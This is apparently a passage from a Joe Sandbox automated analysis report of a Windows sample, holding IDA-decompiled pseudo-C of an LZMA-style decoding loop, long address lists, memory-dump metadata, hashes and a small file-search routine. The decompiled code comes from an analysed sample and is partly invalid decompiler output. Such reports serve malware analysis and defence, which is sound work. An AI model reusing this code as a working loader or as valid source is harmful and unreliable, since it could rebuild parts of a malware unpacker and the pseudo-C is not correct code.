                                  								goto L10;
                                  							}
                                  						case 1:
                                  							L13:
                                  							__eflags =  *(_t614 - 0x6c);
                                  							if( *(_t614 - 0x6c) == 0) {
                                  								 *(_t614 - 0x88) = 1;
                                  								goto L170;
                                  							}
                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                  							_t45 = _t614 - 0x48;
                                  							 *_t45 =  *(_t614 - 0x48) + 1;
                                  							__eflags =  *_t45;
                                  							L15:
                                  							if( *(_t614 - 0x48) < 4) {
                                  								goto L13;
                                  							}
                                  							_t546 =  *(_t614 - 0x40);
                                  							if(_t546 ==  *(_t614 - 0x74)) {
                                  								L20:
                                  								 *(_t614 - 0x48) = 5;
                                  								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                  								goto L23;
                                  							}
                                  							 *(_t614 - 0x74) = _t546;
                                  							if( *(_t614 - 8) != 0) {
                                  								GlobalFree( *(_t614 - 8)); // executed
                                  							}
                                  							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                  							 *(_t614 - 8) = _t534;
                                  							if(_t534 == 0) {
                                  								goto L171;
                                  							} else {
                                  								goto L20;
                                  							}
                                  						case 2:
                                  							L24:
                                  							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                  							 *(_t614 - 0x84) = 6;
                                  							 *(_t614 - 0x4c) = _t553;
                                  							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                  							goto L132;
                                  						case 3:
                                  							L21:
                                  							__eflags =  *(_t614 - 0x6c);
                                  							if( *(_t614 - 0x6c) == 0) {
                                  								 *(_t614 - 0x88) = 3;
                                  								goto L170;
                                  							}
                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                  							_t67 = _t614 - 0x70;
                                  							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                  							__eflags =  *_t67;
                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                  							L23:
                                  							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                  							if( *(_t614 - 0x48) != 0) {
                                  								goto L21;
                                  							}
                                  							goto L24;
                                  						case 4:
                                  							goto L133;
                                  						case 5:
                                  							goto L137;
                                  						case 6:
                                  							goto L0;
                                  						case 7:
                                  							__eflags =  *(__ebp - 0x40) - 1;
                                  							if( *(__ebp - 0x40) != 1) {
                                  								__eax =  *(__ebp - 0x24);
                                  								 *(__ebp - 0x80) = 0x16;
                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  								__eax =  *(__ebp - 0x28);
                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  								__eax =  *(__ebp - 0x2c);
                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  								__eax = 0;
                                  								__eflags =  *(__ebp - 0x38) - 7;
                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  								__al = __al & 0x000000fd;
                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  								__eax =  *(__ebp - 4);
                                  								__eax =  *(__ebp - 4) + 0x664;
                                  								__eflags = __eax;
                                  								 *(__ebp - 0x58) = __eax;
                                  								goto L68;
                                  							}
                                  							__eax =  *(__ebp - 4);
                                  							__ecx =  *(__ebp - 0x38);
                                  							 *(__ebp - 0x84) = 8;
                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  							goto L132;
                                  						case 8:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 4);
                                  								__ecx =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x84) = 0xa;
                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  							} else {
                                  								__eax =  *(__ebp - 0x38);
                                  								__ecx =  *(__ebp - 4);
                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                  								 *(__ebp - 0x84) = 9;
                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  							}
                                  							goto L132;
                                  						case 9:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								goto L89;
                                  							}
                                  							__eflags =  *(__ebp - 0x60);
                                  							if( *(__ebp - 0x60) == 0) {
                                  								goto L171;
                                  							}
                                  							__eax = 0;
                                  							__eflags =  *(__ebp - 0x38) - 7;
                                  							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                  							__eflags = _t258;
                                  							0 | _t258 = _t258 + _t258 + 9;
                                  							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                  							goto L75;
                                  						case 0xa:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 4);
                                  								__ecx =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x84) = 0xb;
                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  								goto L132;
                                  							}
                                  							__eax =  *(__ebp - 0x28);
                                  							goto L88;
                                  						case 0xb:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__ecx =  *(__ebp - 0x24);
                                  								__eax =  *(__ebp - 0x20);
                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  							} else {
                                  								__eax =  *(__ebp - 0x24);
                                  							}
                                  							__ecx =  *(__ebp - 0x28);
                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  							L88:
                                  							__ecx =  *(__ebp - 0x2c);
                                  							 *(__ebp - 0x2c) = __eax;
                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  							L89:
                                  							__eax =  *(__ebp - 4);
                                  							 *(__ebp - 0x80) = 0x15;
                                  							__eax =  *(__ebp - 4) + 0xa68;
                                  							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  							goto L68;
                                  						case 0xc:
                                  							L99:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0xc;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t334 = __ebp - 0x70;
                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t334;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							__eax =  *(__ebp - 0x2c);
                                  							goto L101;
                                  						case 0xd:
                                  							goto L36;
                                  						case 0xe:
                                  							goto L45;
                                  						case 0xf:
                                  							goto L57;
                                  						case 0x10:
                                  							L109:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0x10;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t365 = __ebp - 0x70;
                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t365;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							goto L111;
                                  						case 0x11:
                                  							L68:
                                  							__esi =  *(__ebp - 0x58);
                                  							 *(__ebp - 0x84) = 0x12;
                                  							goto L132;
                                  						case 0x12:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 0x58);
                                  								 *(__ebp - 0x84) = 0x13;
                                  								__esi =  *(__ebp - 0x58) + 2;
                                  								goto L132;
                                  							}
                                  							__eax =  *(__ebp - 0x4c);
                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax =  *(__ebp - 0x4c) << 4;
                                  							__eflags = __eax;
                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                  							goto L130;
                                  						case 0x13:
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								_t469 = __ebp - 0x58;
                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  								__eflags =  *_t469;
                                  								 *(__ebp - 0x30) = 0x10;
                                  								 *(__ebp - 0x40) = 8;
                                  								L144:
                                  								 *(__ebp - 0x7c) = 0x14;
                                  								goto L145;
                                  							}
                                  							__eax =  *(__ebp - 0x4c);
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax =  *(__ebp - 0x4c) << 4;
                                  							 *(__ebp - 0x30) = 8;
                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  							L130:
                                  							 *(__ebp - 0x58) = __eax;
                                  							 *(__ebp - 0x40) = 3;
                                  							goto L144;
                                  						case 0x14:
                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  							__eax =  *(__ebp - 0x80);
                                  							goto L140;
                                  						case 0x15:
                                  							__eax = 0;
                                  							__eflags =  *(__ebp - 0x38) - 7;
                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  							__al = __al & 0x000000fd;
                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  							goto L120;
                                  						case 0x16:
                                  							__eax =  *(__ebp - 0x30);
                                  							__eflags = __eax - 4;
                                  							if(__eax >= 4) {
                                  								_push(3);
                                  								_pop(__eax);
                                  							}
                                  							__ecx =  *(__ebp - 4);
                                  							 *(__ebp - 0x40) = 6;
                                  							__eax = __eax << 7;
                                  							 *(__ebp - 0x7c) = 0x19;
                                  							 *(__ebp - 0x58) = __eax;
                                  							goto L145;
                                  						case 0x17:
                                  							L145:
                                  							__eax =  *(__ebp - 0x40);
                                  							 *(__ebp - 0x50) = 1;
                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  							goto L149;
                                  						case 0x18:
                                  							L146:
                                  							__eflags =  *(__ebp - 0x6c);
                                  							if( *(__ebp - 0x6c) == 0) {
                                  								 *(__ebp - 0x88) = 0x18;
                                  								goto L170;
                                  							}
                                  							__ecx =  *(__ebp - 0x70);
                                  							__eax =  *(__ebp - 0xc);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							_t484 = __ebp - 0x70;
                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                  							__eflags =  *_t484;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  							L148:
                                  							_t487 = __ebp - 0x48;
                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                  							__eflags =  *_t487;
                                  							L149:
                                  							__eflags =  *(__ebp - 0x48);
                                  							if( *(__ebp - 0x48) <= 0) {
                                  								__ecx =  *(__ebp - 0x40);
                                  								__ebx =  *(__ebp - 0x50);
                                  								0 = 1;
                                  								__eax = 1 << __cl;
                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  								__eax =  *(__ebp - 0x7c);
                                  								 *(__ebp - 0x44) = __ebx;
                                  								goto L140;
                                  							}
                                  							__eax =  *(__ebp - 0x50);
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  							__eax =  *(__ebp - 0x58);
                                  							__esi = __edx + __eax;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__ax =  *__esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								__cx = __ax >> 5;
                                  								__eax = __eax - __ecx;
                                  								__edx = __edx + 1;
                                  								__eflags = __edx;
                                  								 *__esi = __ax;
                                  								 *(__ebp - 0x50) = __edx;
                                  							} else {
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								goto L148;
                                  							} else {
                                  								goto L146;
                                  							}
                                  						case 0x19:
                                  							__eflags = __ebx - 4;
                                  							if(__ebx < 4) {
                                  								 *(__ebp - 0x2c) = __ebx;
                                  								L119:
                                  								_t393 = __ebp - 0x2c;
                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                  								__eflags =  *_t393;
                                  								L120:
                                  								__eax =  *(__ebp - 0x2c);
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  									goto L170;
                                  								}
                                  								__eflags = __eax -  *(__ebp - 0x60);
                                  								if(__eax >  *(__ebp - 0x60)) {
                                  									goto L171;
                                  								}
                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  								__eax =  *(__ebp - 0x30);
                                  								_t400 = __ebp - 0x60;
                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  								__eflags =  *_t400;
                                  								goto L123;
                                  							}
                                  							__ecx = __ebx;
                                  							__eax = __ebx;
                                  							__ecx = __ebx >> 1;
                                  							__eax = __ebx & 0x00000001;
                                  							__ecx = (__ebx >> 1) - 1;
                                  							__al = __al | 0x00000002;
                                  							__eax = (__ebx & 0x00000001) << __cl;
                                  							__eflags = __ebx - 0xe;
                                  							 *(__ebp - 0x2c) = __eax;
                                  							if(__ebx >= 0xe) {
                                  								__ebx = 0;
                                  								 *(__ebp - 0x48) = __ecx;
                                  								L102:
                                  								__eflags =  *(__ebp - 0x48);
                                  								if( *(__ebp - 0x48) <= 0) {
                                  									__eax = __eax + __ebx;
                                  									 *(__ebp - 0x40) = 4;
                                  									 *(__ebp - 0x2c) = __eax;
                                  									__eax =  *(__ebp - 4);
                                  									__eax =  *(__ebp - 4) + 0x644;
                                  									__eflags = __eax;
                                  									L108:
                                  									__ebx = 0;
                                  									 *(__ebp - 0x58) = __eax;
                                  									 *(__ebp - 0x50) = 1;
                                  									 *(__ebp - 0x44) = 0;
                                  									 *(__ebp - 0x48) = 0;
                                  									L112:
                                  									__eax =  *(__ebp - 0x40);
                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  										_t391 = __ebp - 0x2c;
                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  										__eflags =  *_t391;
                                  										goto L119;
                                  									}
                                  									__eax =  *(__ebp - 0x50);
                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  									__eax =  *(__ebp - 0x58);
                                  									__esi = __edi + __eax;
                                  									 *(__ebp - 0x54) = __esi;
                                  									__ax =  *__esi;
                                  									__ecx = __ax & 0x0000ffff;
                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                  									if( *(__ebp - 0xc) >= __edx) {
                                  										__ecx = 0;
                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  										__ecx = 1;
                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  										__ebx = 1;
                                  										__ecx =  *(__ebp - 0x48);
                                  										__ebx = 1 << __cl;
                                  										__ecx = 1 << __cl;
                                  										__ebx =  *(__ebp - 0x44);
                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                  										__cx = __ax;
                                  										__cx = __ax >> 5;
                                  										__eax = __eax - __ecx;
                                  										__edi = __edi + 1;
                                  										__eflags = __edi;
                                  										 *(__ebp - 0x44) = __ebx;
                                  										 *__esi = __ax;
                                  										 *(__ebp - 0x50) = __edi;
                                  									} else {
                                  										 *(__ebp - 0x10) = __edx;
                                  										0x800 = 0x800 - __ecx;
                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  										 *__esi = __dx;
                                  									}
                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                  										L111:
                                  										_t368 = __ebp - 0x48;
                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                  										__eflags =  *_t368;
                                  										goto L112;
                                  									} else {
                                  										goto L109;
                                  									}
                                  								}
                                  								__ecx =  *(__ebp - 0xc);
                                  								__ebx = __ebx + __ebx;
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  								 *(__ebp - 0x44) = __ebx;
                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  									__ecx =  *(__ebp - 0x10);
                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  									__ebx = __ebx | 0x00000001;
                                  									__eflags = __ebx;
                                  									 *(__ebp - 0x44) = __ebx;
                                  								}
                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                  									L101:
                                  									_t338 = __ebp - 0x48;
                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                  									__eflags =  *_t338;
                                  									goto L102;
                                  								} else {
                                  									goto L99;
                                  								}
                                  							}
                                  							__edx =  *(__ebp - 4);
                                  							__eax = __eax - __ebx;
                                  							 *(__ebp - 0x40) = __ecx;
                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  							goto L108;
                                  						case 0x1a:
                                  							goto L55;
                                  						case 0x1b:
                                  							L75:
                                  							__eflags =  *(__ebp - 0x64);
                                  							if( *(__ebp - 0x64) == 0) {
                                  								 *(__ebp - 0x88) = 0x1b;
                                  								goto L170;
                                  							}
                                  							__eax =  *(__ebp - 0x14);
                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  							__eflags = __eax -  *(__ebp - 0x74);
                                  							if(__eax >=  *(__ebp - 0x74)) {
                                  								__eax = __eax +  *(__ebp - 0x74);
                                  								__eflags = __eax;
                                  							}
                                  							__edx =  *(__ebp - 8);
                                  							__cl =  *(__eax + __edx);
                                  							__eax =  *(__ebp - 0x14);
                                  							 *(__ebp - 0x5c) = __cl;
                                  							 *(__eax + __edx) = __cl;
                                  							__eax = __eax + 1;
                                  							__edx = 0;
                                  							_t274 = __eax %  *(__ebp - 0x74);
                                  							__eax = __eax /  *(__ebp - 0x74);
                                  							__edx = _t274;
                                  							__eax =  *(__ebp - 0x68);
                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  							_t283 = __ebp - 0x64;
                                  							 *_t283 =  *(__ebp - 0x64) - 1;
                                  							__eflags =  *_t283;
                                  							 *( *(__ebp - 0x68)) = __cl;
                                  							goto L79;
                                  						case 0x1c:
                                  							while(1) {
                                  								L123:
                                  								__eflags =  *(__ebp - 0x64);
                                  								if( *(__ebp - 0x64) == 0) {
                                  									break;
                                  								}
                                  								__eax =  *(__ebp - 0x14);
                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  								__eflags = __eax -  *(__ebp - 0x74);
                                  								if(__eax >=  *(__ebp - 0x74)) {
                                  									__eax = __eax +  *(__ebp - 0x74);
                                  									__eflags = __eax;
                                  								}
                                  								__edx =  *(__ebp - 8);
                                  								__cl =  *(__eax + __edx);
                                  								__eax =  *(__ebp - 0x14);
                                  								 *(__ebp - 0x5c) = __cl;
                                  								 *(__eax + __edx) = __cl;
                                  								__eax = __eax + 1;
                                  								__edx = 0;
                                  								_t414 = __eax %  *(__ebp - 0x74);
                                  								__eax = __eax /  *(__ebp - 0x74);
                                  								__edx = _t414;
                                  								__eax =  *(__ebp - 0x68);
                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  								__eflags =  *(__ebp - 0x30);
                                  								 *( *(__ebp - 0x68)) = __cl;
                                  								 *(__ebp - 0x14) = __edx;
                                  								if( *(__ebp - 0x30) > 0) {
                                  									continue;
                                  								} else {
                                  									goto L80;
                                  								}
                                  							}
                                  							 *(__ebp - 0x88) = 0x1c;
                                  							goto L170;
                                  					}
                                  				}
                                  			}













                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00000000
                                  0x0040722f
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                  • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                  • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                  • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 707 40683d-406851 FindFirstFileW 708 406853-40685c FindClose 707->708 709 40685e 707->709 710 406860-406861 708->710 709->710
                                  C-Code - Quality: 100%
                                  			E0040683D(WCHAR* _a4) {
                                  				void* _t2;
                                  
                                  				_t2 = FindFirstFileW(_a4, 0x426758); // executed
                                  				if(_t2 == 0xffffffff) {
                                  					return 0;
                                  				}
                                  				FindClose(_t2);
                                  				return 0x426758;
                                  			}





                                  APIs
                                  • FindFirstFileW.KERNELBASE(7620FAA0,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                  • FindClose.KERNEL32(00000000), ref: 00406854
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
